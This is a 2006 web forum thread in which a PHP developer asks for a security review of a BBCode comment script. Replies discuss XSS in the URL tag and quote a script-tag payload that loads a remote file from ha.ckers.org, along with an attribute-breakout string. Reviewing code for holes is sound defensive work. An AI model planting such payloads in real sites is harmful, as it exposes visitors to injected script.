Page 1 of 1

Form Security Advices?

Posted: Mon Dec 11, 2006 10:52 am
by kaisellgren
Greetings dear members!

I have been reading thousands of articles of PHP security and I wrote a simple comment script.

Can you find anything 'evilish' or even annoying bugs?

Code: Select all

<?php

$message = $_POST["message"];

/*
 No HTML accepted directly. Only accepted using through BBCode.
*/
$message = htmlspecialchars($message);

/*
 Convert line feeds and carriage returns to <br /> tag.
*/
$message = preg_replace("/\x0D\x0A/","<br />",$message);

/*
 Replacing all BBCode URL tags [url=xxx]yyy[/url] with working HTML anchors
 IF the xxx has NOT characters '(', ')' or ';'.
 
 This makes it possible to use any protocol in anchors that does not carry anything dangerous.
 For example 'mailto:example@host.com' is valid while 'javascript: alert();' is not.
 
 The reason why I like this method is that when you type '[url=javascript:alert("hacked");]click[/url]',
 it will not be stripped off or even modified - it will be shown as it is: '[url=javascript:alert("hacked");]click[/url]'.
*/
$message = preg_replace("/\[url=([^\]\(\);]+?)\](.+?)\[\/url\]/i","<a href=\"\\1\">\\2</a>",$message);

echo $message;

?>
I really want it to be totally 'unhackable'. ANY advices taken.

Thank you for your time! :)

Posted: Mon Dec 11, 2006 11:17 am
by feyd
Your url tag accepts injection.

Your line-feed regular expression could easily be replaced by str_replace() using \r\n as the needle.

Posted: Mon Dec 11, 2006 11:24 am
by kaisellgren
feyd wrote:Your url tag accepts injection.

Your line-feed regular expression could easily be replaced by str_replace() using \r\n as the needle.
I read something from Wikipedia that it's better to use \x0D\x0A than \r\n for some reason... don't remember why. Maybe it does not matter when it comes to web programming?

What kind of injection is the url tag vulnerable? Javascript, no... vbscript no... applets no, file no, about no, wysiwyg no, data no, view-source yes! but how cares? , ms-its no, mhtml, shell, lynxexec, lynxcgi, hcp, ms-help, help, disk, vnd.ms.radio, opera, res, resource, chrome, mocha, livescript, .... tryed anything I can ever find but nothing passed. Nothing evilish... or is it that it does not work in my browser but works in IE ?

Posted: Mon Dec 11, 2006 7:18 pm
by Ambush Commander
I read something from Wikipedia that it's better to use \x0D\x0A than \r\n for some reason... don't remember why. Maybe it does not matter when it comes to web programming?
This is applicable to languages where "\n" is not really "\x0A" but rather a magic character that is OS-dependent. PHP is not one of those languages, so stick with "\r\n".
What kind of injection is the url tag vulnerable? Javascript, no... vbscript no... applets no, file no, about no, wysiwyg no, data no, view-source yes! but how cares? , ms-its no, mhtml, shell, lynxexec, lynxcgi, hcp, ms-help, help, disk, vnd.ms.radio, opera, res, resource, chrome, mocha, livescript, .... tryed anything I can ever find but nothing passed. Nothing evilish... or is it that it does not work in my browser but works in IE ?
Try setting message to =">Hmm<". You also assume that JavaScript needs () to work: it doesn't: see this:

Code: Select all

><SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT><
Just use a fully fledged URI regex.

Posted: Tue Dec 12, 2006 3:03 am
by kaisellgren
Ambush Commander wrote:
I read something from Wikipedia that it's better to use \x0D\x0A than \r\n for some reason... don't remember why. Maybe it does not matter when it comes to web programming?
This is applicable to languages where "\n" is not really "\x0A" but rather a magic character that is OS-dependent. PHP is not one of those languages, so stick with "\r\n".
What kind of injection is the url tag vulnerable? Javascript, no... vbscript no... applets no, file no, about no, wysiwyg no, data no, view-source yes! but how cares? , ms-its no, mhtml, shell, lynxexec, lynxcgi, hcp, ms-help, help, disk, vnd.ms.radio, opera, res, resource, chrome, mocha, livescript, .... tryed anything I can ever find but nothing passed. Nothing evilish... or is it that it does not work in my browser but works in IE ?
Try setting message to =">Hmm<". You also assume that JavaScript needs () to work: it doesn't: see this:

Code: Select all

><SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT><
Just use a fully fledged URI regex.
Strange, but this sdfsd is outputted to sdfsd without any html anchors. Why? In my regex there are only ](); listed so it should make it anchor. Perhaps some security thing in PHP? Also this outputs only text:

Code: Select all

[url=">Hmm<"]sdfsd[/url]
Nothing dangerous in that, just tested. Or did I type something wrong? I guess you tried to break the html anchor tag with "> and the output hmm, but didn't work though.

EDIT: I realized. Your both first and second methods don't work because I used htmlspecialchars() !